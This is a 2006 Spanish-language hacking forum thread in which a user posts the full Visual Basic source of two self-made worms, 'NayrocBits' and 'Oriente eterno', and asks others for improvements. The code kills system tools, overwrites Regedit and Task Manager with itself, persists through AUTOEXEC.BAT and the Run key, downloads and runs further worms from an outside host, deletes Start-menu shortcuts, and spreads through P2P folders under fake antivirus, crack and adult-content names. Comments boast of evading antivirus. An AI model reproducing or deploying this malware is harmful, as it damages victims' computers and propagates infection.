Título: NayrocBits - Malware
Publicado por: sp26 en 28 Diciembre 2006, 01:58 am
Opinen sobre este malware... diganme que mas le puedo añadir... que puede estar mal... o que le puedo quitar... :huh: Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Dim ERROR_SUCCESS Private Sub Clipb() On Error GoTo clip Do Clipboard.Clear Clipboard.SetText " K-32 - Prayamama" Loop clip: End Sub Private Sub NayrocSTAM() Do On Error GoTo NoSTAM PagInicia ("http://www.elhacker.net") TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") MsgBox " " & vbCrLf & " ", vbCritical Loop
NoSTAM:
End Sub Private Function Secuestro(UpPath As String, DownPath As String) On Error GoTo seNO FileCopy UpPath$, DownPath$ Kill UpPath$ seNO: End Function Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub
Private Sub AeroBits() On Error GoTo seNO: Do Matar ("Taskmgr.exe") Matar ("Regedit.exe") Matar ("Services.msc") Matar ("cmd.exe") Matar ("Explorer.exe") Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
seNO: Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe" Loop End Sub
Private Sub NayrocSTEM()
Dim Archivo As String Dim NumArchivo As Long Dim Archivo2 As String Dim NumArchivo2 As Long On Error Resume Next On Error GoTo NoHayBat Do FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe") Matar ("CMD.exe") Matar ("Regedit.exe") Matar ("services.msc") Matar ("msnmsgr.exe") Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT" NumArchivo = FreeFile() 'Aqui me añado al 'AUTOEXEC.BAT ' 'Para iniciarme cada vez que el sistema corra '¿Sera esta una via alterna? 'Al yo poner "DEFLPS" 'llama el archivo antes copiado 'Es necesario que se copie antes en la carpeta SYSTEM32 'Esto me da una via alterna contra los AV Open Archivo For Output As #NumArchivo Print #NumArchivo, "Echo off" Print #NumArchivo, "Title AUTOEXEC.BAT" '-- Print #NumArchivo, "CLS" Print #NumArchivo, "Echo Loading..." Print #NumArchivo, "CLS" Print #NumArchivo, "cls" Print #NumArchivo, "deflps" Close #NumArchivo NoHayBat: On Error Resume Next 'DeflPO 'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat" NumArchivo2 = FreeFile() Print #NumArchivo, "Echo off" Print #NumArchivo, "title Analizador de discos lógicos" Print #NumArchivo, "cls" Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat" Close #NumArchivo Shell Environ("SYSTEMROOT") & "\Call.bat" Loop End Sub Private Sub AñoNuevo()
'Feliz año nuevo xDD Do
If Month(Now) = 1 And Day(Now) = 1 Then AñoNuevoUp
End If Loop End Sub
Private Sub AñoNuevoUp() Dim ArchivoK32 As String Dim NumArchivoK32 As Long Do ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat" NumArchivoK32 = FreeFile()
Print #NumArchivoK32, "Echo off" Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls" Print #NumArchivoK32, "Deflpo" Print #NumArchivoK32, "Cls" Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat" 'Lo hago como BAT ya que es mas efectivo para los AV's, En especial 'NOD32
Loop
End Sub
Private Sub Ds_Click() MsgBox "Desinfectado"
End Sub
Private Sub Form_Load() On Error Resume Next App.TaskVisible = False MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb NayrocSTAM DeflPO NayrocSTEM AñoNuevo AeroBits
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing
ErrHandler: Err.Clear End Sub
Private Sub DeflPO() 'ORIENTE-ETERNO : Modo silencioso Do Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _ "DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" Loop End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub Form_Unload(Cancel As Integer) MsgBox " ", vbCritical Do Shell App.Path & App.EXEName & ".exe" Loop
End Sub Y En un modulo... Option Explicit
Declare Function RegCreateKey Lib _ "advapi32.dll" Alias "RegCreateKeyA" _ (ByVal HKey As Long, ByVal lpSubKey As _ String, phkResult As Long) As Long Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long Declare Function RegSetValueEx Lib _ "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal _ lpValueName As String, ByVal _ Reserved As Long, ByVal dwType _ As Long, lpData As Any, ByVal _ cbData As Long) As Long
Public Sub SaveString(HKey As Long, Path As String, _ Name As String, Data As String) Dim KeyHandle As Long Dim r As Long Dim REG_SZ r = RegCreateKey(HKey, Path, KeyHandle) r = RegSetValueEx(KeyHandle, Name, 0, _ REG_SZ, ByVal Data, Len(Data)) r = RegCloseKey(KeyHandle) End Sub
Public Sub PagInicia(Direccion As String) Call SaveString("HKEY_CURRENT_USER", _ "Software\Microsoft\Internet Explorer\Main", _ "Start Page", Direccion) End Sub Public Sub TituloInicia(Titulo As String) Call SaveString("HKEY_CURRENT_USER", _ "Software\Microsoft\Internet Explorer\Main", _ "Window Title", Titulo) End Sub
Opinen ;)
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 28 Diciembre 2006, 04:11 am
Muchos ven y nadie opina... estara muy mal el malware?
Título: Re: NayrocBits - Malware
Publicado por: CeLaYa en 28 Diciembre 2006, 20:08 pm
:o disculpa mi ignorancia, ¿que es lo que hace exactamente? :huh:
Título: Re: NayrocBits - Malware
Publicado por: Zeroql en 28 Diciembre 2006, 22:50 pm
heeeeeee sip tu malware para que rayos sirve, solo veo que matas procesos y ya, no entiendo aunke no lo he probado en el code se ve que solo matas procesos
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 29 Diciembre 2006, 01:06 am
Lo que hace es autocopiarse y suplementar otros archivos. por ejemplo, este suplementa el "Regedit", el "Taskmgr (Administrador de tareas) y el "Services.msc". Cuando presionen el "CTRL+ALT+SPR" mi worm se ejecutara (Eso tengo previsto :P), tambien se añade al AUTOEXEC para iniciarse con el sistema sin necesidad de añadirme al registro. Lo que hace es multiplicarse y multiplicarse, tambien descarga la otra version un poco mas violenta llamada "Oriente-eterno" (Lo descarga y tambien lo ejecuta mediante el mismo procedimiento). Tambien cambia el titulo del IE y la pagina principal. Lo explicare mejor: Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ 'Estas son apis para descargar archivos sin ser detectados ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS Private Sub Clipb() On Error GoTo clip Do Clipboard.Clear Clipboard.SetText " K-32 - Prayamama" 'Este se mantiene en el clipboard mediante el DO, cuando den al "CTRL+V" Se copiara eso automaticamente :p Loop clip: End Sub Private Sub NayrocSTAM() Do On Error GoTo NoSTAM PagInicia ("http://www.elhacker.net") ' Este cambia la pagina de inicio TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)") 'Este cambia el titulo del IE, en vez de decir "Microsoft Internet Explorer" dice ese titulo :P MsgBox " " & vbCrLf & " ", vbCritical Loop
NoSTAM:
End Sub
Private Function Secuestro(UpPath As String, DownPath As String)'Funcion para mover archivos On Error GoTo seNO FileCopy UpPath$, DownPath$ Kill UpPath$ seNO: End Function Public Sub SecuestroCarpeta(DirPath As String) On Error GoTo error MkDir DirPath$ Exit Sub error: 'Crear carpetas de secuestro End Sub
Private Sub AeroBits() On Error GoTo seNO: Do 'Matar procesos antes de copiar Matar ("Taskmgr.exe") Matar ("Regedit.exe") Matar ("Services.msc") Matar ("cmd.exe") Matar ("Explorer.exe") Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\" 'Creamos carpetas de secuestro
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt" 'Lo copiamos en archivos .TXT
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
'Nos suplementamos.
seNO: Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe" Loop End Sub
Private Sub NayrocSTEM()
Dim Archivo As String Dim NumArchivo As Long Dim Archivo2 As String Dim NumArchivo2 As Long On Error Resume Next On Error GoTo NoHayBat Do FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe") Matar ("CMD.exe") Matar ("Regedit.exe") Matar ("services.msc") Matar ("msnmsgr.exe") Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT" NumArchivo = FreeFile() 'Aqui me añado al 'AUTOEXEC.BAT ' 'Para iniciarme cada vez que el sistema corra '¿Sera esta una via alterna? 'Al yo poner "DEFLPS" 'llama el archivo antes copiado 'Es necesario que se copie antes en la carpeta SYSTEM32 'Esto me da una via alterna contra los AV Open Archivo For Output As #NumArchivo Print #NumArchivo, "Echo off" Print #NumArchivo, "Title AUTOEXEC.BAT" '-- Print #NumArchivo, "CLS" Print #NumArchivo, "Echo Loading..." Print #NumArchivo, "CLS" Print #NumArchivo, "cls" Print #NumArchivo, "deflps" Close #NumArchivo NoHayBat: On Error Resume Next 'DeflPO 'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat" NumArchivo2 = FreeFile() Print #NumArchivo, "Echo off" Print #NumArchivo, "title Analizador de discos lógicos" Print #NumArchivo, "cls" Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat" Close #NumArchivo Shell Environ("SYSTEMROOT") & "\Call.bat" Loop End Sub Private Sub AñoNuevo()
'Feliz año nuevo xDD Do
If Month(Now) = 1 And Day(Now) = 1 Then AñoNuevoUp
End If Loop End Sub
Private Sub AñoNuevoUp() Dim ArchivoK32 As String Dim NumArchivoK32 As Long Do ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat" NumArchivoK32 = FreeFile()
'Aqui se ejecuta en año nuevo :)
Print #NumArchivoK32, "Echo off" Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls" Print #NumArchivoK32, "Deflpo" Print #NumArchivoK32, "Cls" Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat" 'Lo hago como BAT ya que es mas efectivo para los AV's, En especial 'NOD32
Loop
End Sub
Private Sub Ds_Click() MsgBox "Desinfectado"
End Sub
Private Sub Form_Load() On Error Resume Next App.TaskVisible = False MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb NayrocSTAM DeflPO NayrocSTEM AñoNuevo AeroBits
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing
ErrHandler: Err.Clear End Sub
Private Sub DeflPO() 'ORIENTE-ETERNO : Modo silencioso Do Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _ "DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" 'Descargamos el otro malguar Loop End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub Form_Unload(Cancel As Integer) MsgBox " ", vbCritical Do Shell App.Path & App.EXEName & ".exe" Loop
End Sub el modulo no tengo que explicar mucho, ya esta mas que claro :P.
Título: Re: NayrocBits - Malware
Publicado por: CeLaYa en 29 Diciembre 2006, 01:42 am
orale!!!! esas son ganas de joder gente. y el "Oriente-eterno" que hace?
Título: Re: NayrocBits - Malware
Publicado por: DrakoX en 29 Diciembre 2006, 01:49 am
esta bueno, pero habria que ver que es lo que descarga exactamente jaja ;D
yo toy empesando un worm, así que en cuanto lo termine les aviso, y lo posteo
salu2
Título: Re: NayrocBits - Malware
Publicado por: sp26 en 29 Diciembre 2006, 02:05 am
- Oriente eterno- Option Explicit Private Declare Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" _ (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ 'API's para descargar sin ser detectado ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Dim ERROR_SUCCESS Private Sub Alumbra() On Error Resume Next
Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/DCOM/InetCat.exe" DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\InetCat.exe"
'Descarga el Inetcat, exactamente el InetCat es el NayrocBits, solo que le cambie el nombre :P
End Sub Private Sub Orientame() On Error Resume Next Dim RegistroCochino As Object Dim RutaCochina As String Dim CadenaNueva As String Dim ContenidoCadena As String ContenidoCadena = App.Path & "\" & App.EXEName & ".Exe" CadenaNueva = "\SystemTray" RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _ "\CurrentVersion\Run" & CadenaNueva Set RegistroCochino = CreateObject("WScript.Shell") RegistroCochino.RegWrite RutaCochina, ContenidoCadena 'Aqui me añado al registro. End Sub
Private Function NumeroAleartorio(Entre As Integer, yEntre As Integer) As Integer On Error Resume Next Randomize NumeroAleartorio = Int((Entre - yEntre + 1) * Rnd + yEntre) End Function 'Funcion para generar numeros aleatorios
Private Sub EliminarInicio() Do On Error Resume Next Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\" & "*.*" Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\" & "*.*" Kill Environ("systemdrive") & "\Documents and settings\All Users\Menú inicio\Programas\Accesorios\Herramientas del sistema\" & "*.*"
'Aqui elimino los accesos directos
End Sub
Private Sub OccidenteIntolerante() On Error Resume Next Dim sel sel = Int(Rnd() * 7) Select Case sel
'Aqui mezcle el radom y el case, lo que sucede es que se "Ejecuta cierto codigo de manera aleatoria". 'Aclaro que donde dice "Label1" es donde van los numeros aleatorios. :P
Case 0 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe")
Case 1 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe")
Case 2 MsgBox "Error en la rutina" & " " & Label1 & "en tiempo de ejecucion", vbExclamation Matar ("Explorer.exe") Case 3 Matar ("explorer.exe") Matar ("iexplore.exe") Matar ("msnmsgr.exe") Matar ("firefox.exe") Matar ("opera.exe") Matar ("taskmgr.exe") Matar ("regedit.exe") Case 4 Shell Environ("SYSTEMROOT") & "\InetCat.exe" MsgBox " ", vbCritical
Case 5 SecuestroCarpeta Environ("SYSTEMDRIVE") & "\RECYCLER\SECUESTRO\" Matar ("services.msc") Matar ("taskmgr.exe") Matar ("regedit.exe") FileCopy Environ("sys32") & "\services.msc", Environ("systemdrive") & "\RECYCLER\Secuestro\services.msc" FileCopy Environ("sys32") & "\regedit.exe", Environ("systemdrive") & "\RECYCLER\Secuestro\regedit.exe" FileCopy Environ("sys32") & "\taskmgr.exe", Environ("systemdrive") & "\RECYCLCER\SECUESTRO\taskmgr.exe" Kill Environ("SYS32") & "\services.msc" Kill Environ("sys32") & "\regedit.exe" Kill Environ("sys32") & "\taskmgr.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\regedit.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\taskmgr.exe" FileCopy App.Path & App.EXEName & ".exe", Environ("sys32") & "\services.msc" MsgBox " ", vbCritical
'Aqui me suplemento con los archivos importantes.
Case 6 do msgbox " ", vbCritical, " " loop
End Select End Sub Private Sub InfectarP2P()
On Error GoTo NOHAYP2P: Do
'Aqui me añado a un archivo RAR y me copio a distintos directorios P2P, para expandirme... Esta idea la saque de una guia por Hendrix, muy buena idea ;).
Shell Environ("programfiles") & "\WINRAR\WinRAR.exe" & " a """ & Environ("Systemdrive") & "\K.rar"" """ & App.Path & "\" & App.EXEName & ".exe" & """", vbHide
FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Removal Tools.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Anti-Sasser.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Mis documentos.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("programfiles") & "\EDONKEY2000\incoming\Fotos Desnudas.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Removal Tools.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Mis documentos.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\eMule\Incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Filetopia3\Files\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\appleJuice\incoming\K-32.rar"
FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Listanegra-Kaspersky.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Norton Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Anti-virus.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\NOD32-Full.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\ZoneAlarm-Professional.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Internet Security.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Gedzac.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\PowerDVD.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack-NFS.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Crack.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\juego-3.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\xxx.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Area 51.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\Fotos Desnudas.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\SPRITER.rar" FileCopy Environ("Systemdrive") & "\K.rar", Environ("ProgramFiles") & "\Gnucleus\Downloads\K-32.rar"
